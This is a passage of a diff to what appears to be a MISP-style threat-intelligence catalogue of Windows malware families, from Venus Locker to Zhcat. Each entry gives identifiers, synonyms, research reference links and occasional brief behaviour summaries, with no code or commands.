"https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", + "https://twitter.com/JaromirHorejsi/status/813690129088937984" + ] + }, + "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", + "value": "Venus Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", + "value": "Vermin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", + "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" + ] + }, + "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", + "value": "Vflooder", + "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", + "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" + ] + }, + "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", + "value": "virdetdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/" + ] + }, + "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", + "value": "Virut", + "description": "" + }, + { + "meta": { + "synonyms": [ + "VMzeus", + "ZeusVM", + "Zberp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", + "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" + ] + }, + "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", + "value": "VM Zeus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", + "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" + ] + }, + "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", + "value": "Vobfus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FALLCHILL", + "Manuscrypt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", + "https://www.us-cert.gov/ncas/alerts/TA17-318B" + ] + }, + "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", + "value": "Volgmer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", + "https://twitter.com/malware_traffic/status/821483557990318080" + ] + }, + "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", + "value": "Vreikstadi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", + "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", + "http://www.xylibox.com/2013/01/vskimmer.html", + "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" + ] + }, + "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", + "value": "vSkimmer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", + "https://attack.mitre.org/wiki/Group/G0022" + ] + }, + "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", + "value": "w32times", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wcry", + "WannaCry", + "Wana Decrypt0r" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", + "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", + "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", + "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", + "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", + "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", + "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", + "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", + "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", + "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", + "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", + "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", + "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html" + ] + }, + "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", + "value": "WannaCryptor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", + "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" + ] + }, + "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", + "value": "WaterMiner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "d238262a-4832-408f-9926-a7174e671b50", + "value": "WaterSpout", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", + "value": "WebC2-AdSpace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", + "value": "WebC2-Ausov", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", + "value": "WebC2-Bolid", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", + "value": "WebC2-Cson", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "acdda3e5-e776-419b-b060-14f3406de061", + "value": "WebC2-DIV", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", + "value": "WebC2-GreenCat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", + "value": "WebC2-Head", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", + "value": "WebC2-Kt3", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", + "value": "WebC2-Qbp", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", + "value": "WebC2-Rave", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", + "value": "WebC2-Table", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", + "value": "WebC2-UGX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", + "value": "WebC2-Yahoo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + ] + }, + "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", + "value": "WebMonitor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", + "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" + ] + }, + "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", + "value": "WellMess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", + "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" + ] + }, + "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", + "value": "WildFire", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "6a100902-7204-4f20-b838-545ed86d4428", + "value": "WinMM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://github.com/TKCERT/winnti-nmap-script", + "https://github.com/TKCERT/winnti-suricata-lua", + "https://github.com/TKCERT/winnti-detector" + ] + }, + "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "value": "Winnti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "db755407-4135-414c-90e3-97f5e48c6065", + "value": "Winsloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" + ] + }, + "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", + "value": "Wipbot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wimmie", + "Syndicasec" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", + "https://secrary.com/ReversingMalware/WMIGhost/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", + "value": "WMI Ghost", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", + "value": "WndTest", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", + "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + ] + }, + "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", + "value": "Wonknu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", + "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" + ] + }, + "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", + "value": "woody", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WoolenLogger" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" + ] + }, + "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", + "value": "Woolger", + "description": "" + }, + { + "meta": { + "synonyms": [ + "splm", + "chopstick" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" + ] + }, + "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", + "value": "XBot POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" + ] + }, + "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", + "value": "XBTL", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", + "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", + "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" + ] + }, + "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", + "value": "Xpan", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Expectra" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", + "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", + "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" + ] + }, + "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", + "value": "XPCTRA", + "description": "Incorporates code of Quasar RAT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" + ] + }, + "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", + "value": "XP PrivEsc (CVE-2014-4076)", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nokian" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", + "value": "xsPlus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "xaps" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", + "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", + "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" + ] + }, + "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", + "value": "X-Tunnel", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ShadowWalker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + ] + }, + "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", + "value": "xxmm", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KeyBoy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", + "value": "Yahoyah", + "description": "" + }, + { + "meta": { + "synonyms": [ + "bbsinfo", + "aumlib" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", + "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" + ] + }, + "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", + "value": "yayih", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DarkShare" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", + "https://www.youtube.com/watch?v=AUGxYhE_CUY" + ] + }, + "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", + "value": "YoungLotus", + "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", + "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", + "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + ] + }, + "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", + "value": "yty", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zekapab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + ] + }, + "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", + "value": "Zebrocy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" + ] + }, + "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", + "value": "Zebrocy (AutoIT)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" + ] + }, + "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", + "value": "Zedhou", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Max++", + "Smiscer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", + "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", + "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", + "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", + "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", + "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html" + ] + }, + "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", + "value": "ZeroAccess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil" + ] + }, + "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", + "value": "ZeroEvil", + "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", + "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" + ] + }, + "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", + "value": "ZeroT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", + "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", + "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", + "https://www.secureworks.com/research/zeus?threat=zeus", + "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", + "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", + "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", + "http://eternal-todo.com/blog/zeus-spreading-facebook", + "http://eternal-todo.com/blog/new-zeus-binary", + "http://eternal-todo.com/blog/detecting-zeus", + "https://www.mnin.org/write/ZeusMalware.pdf", + "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html", + "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", + "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", + "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", + "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", + "https://zeustracker.abuse.ch/monitor.php", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html" + ] + }, + "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", + "value": "Zeus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" + ] + }, + "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", + "value": "Zeus MailSniffer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", + "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", + "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", + "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/" + ] + }, + "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", + "value": "Zeus Sphinx", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl" + ] + }, + "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", + "value": "Zeus SSL", + "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", + "https://twitter.com/siri_urz/status/923479126656323584", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" + ] + }, + "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", + "value": "Zezin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", + 